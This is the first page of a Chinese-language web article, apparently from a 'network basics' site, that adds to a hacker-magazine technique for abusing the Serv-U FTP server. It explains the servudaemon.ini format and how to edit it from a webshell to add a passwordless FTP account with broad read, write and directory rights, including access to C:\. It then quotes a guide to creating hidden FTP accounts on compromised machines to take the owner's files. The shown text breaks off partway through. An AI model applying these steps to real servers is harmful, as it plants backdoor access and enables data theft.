关于Serv-U提升又一法的补充_网络基础知识

关于Serv-U提升又一法的补充,标签：网络基础,计算机网络基础知识,http://www.qz26.com

《Serv-U提升又一法》原文见《黑客X档案》2005第一期，浪迹天发表的那篇文章。其实技术在网上很早就有了，只不过当初太有人注意。我觉得这方法很绝，所以也深入研究了一下，挖到了一点好东西，不敢独享，就决定帖出来给大家看。（其实只所以帖出来，还因为我实践时没成功，呵呵，千万去要砸我）。
讲之前就给有些朋友复习一下。全文的重点还是在那个要命的servudaemon.ini文件，如果大家有网站的webshell并且可以访问目录，修改这个文件应该不难。
下面请看一个servdaemon.ini的范例，#号后是我写的说明文字，不是文件中的文字。

[GLOBAL]   #定义一些全局参数
Version=5.2.0.0
PacketTimeOut=300
PASVPortStart=9000
PASVPortRange=41
ProcessID=1064
[DOMAINS]   #在这里定义域名及IP，端口号
Domain1=0.0.0.0
21|Wizard Generated Domain|1|0
[Domain1]   #用户名的定义
MaxNrUsers=800
SQLListAll=
SQLListName=
SQLListSort=          （这一部分我也没看懂，希望哪位高手能告诉我）
SQLDelete=
SQLInsert=
SQLUpdate=
User1=Anonymous|1|0 #第一个用户是anonymous，即匿名用户，允许匿名用户访问
User2=XXXX|1|0 #第二个用户
[USER=Anonymous|1]   #用户"anonymous"的定义
HomeDir=e:\ #用户anonymous的根目录
RelPaths=1 #锁定在根目录，如果不锁定在根目录可以把该行删除
TimeOut=600
Access1=e:\|RLP #用户anonymous权限设置在此处，具体的后面会涉及
SKEYValues=
[USER=XXXX|1]    #用户"XXXX"的定义
Password=cuA40FB53D1C89D1E715    #经MD5加密的密码
注：如果不想要密码应该把这行删掉，而不是简单就设为空
HomeDir=e:\\

RelPaths=1
TimeOut=600
Access1=E:\|RWAMLCDP
SKEYValues=
[DOMAINS]
Domain1=202.10.66.12||21| #前面有讲到IP和端口的设置，但我在看里其他服务器的设置，这个地方却也有出现

权限设定具体说明：
RL 只能读文件，下载文件
RWL 可以写文件，所以可以上载文件
RWML M是可以删除的权限
RWAMEL A是添加权限，E是执行权限
RWLCD C是目录创建权限，D是目录删除权限
注意：权限后必须带P

修改的步骤是在[DOMAIN1]中先添加用户名称，如上例中已经有三个用户anonymous、XXXX、，再添加一个用户3，密码为空，在e:\目录下可以读写文件、创建删除目录，不锁定在本目录，同时对C:\有访问权限。

先在[Domain1]下增加一个用户，如下：
user3=XXXX2|1|0

然后再增加一个段，说明用户"XXXX2"的权限
[user3=XXXX2|1]
HomeDir=e:\\

TimeOut=600
Access1=e:\|RWLCDP
Access2=C:\|RLP #这里也可以自由设置

接下来就是重点的重点了，是我再网上挖到的宝贝，因为作者（我把他的名字忘记了，希望他不要找上门，呵呵）也是在本地测试通过，没有在肉机上做过，害我在肉鸡上实验时也没成功。
*********************************************************
在 Serv-U 中建立隐藏用户(本地通过，未经肉鸡测试~~希望大家完善本文)

在如今的 FTP 服务段软件中，Serv-U 以其简单易用性成为广大管理员的首选，当我
们控制一台肉鸡后，如果它采用 Serv-U 管理 FTP ，我们该如何建立一个隐藏的 FTP 账
户来下载他的东东呢？

我们可以采用 Serv-U Assistant 这个软件，可以到作者网页 http://www.katkat.com/ 或
者在华军下载（目前版本为1.01）

这个软件主要用于扩充 Serv-U 的帐号管理, 它采用Serv-U扩展库，实现的原理为"帐
号-映射"，建立一个或多个帐号"映射"，当在 Serv-U 中设置好一个固定帐号（即Serv-U
的帐号）后，"映射帐号"就继承了这个固定帐号的所有权限设置，每个"映射帐号" 有各
自的登录密码。

下载压缩文件 AssServU.zip，解压后得到以下文件：
AssServU.dll -------- 扩充功能库
AssServU.exe -------- 管理主程序
AssServU.ini -------- 配置文件
AssServU.mdb -------- 数据库文件

[1] [2] 下一页

Tag:网络基础知识，网络基础,计算机网络基础知识，电脑培训学习 - 网络知识 - 网络基础知识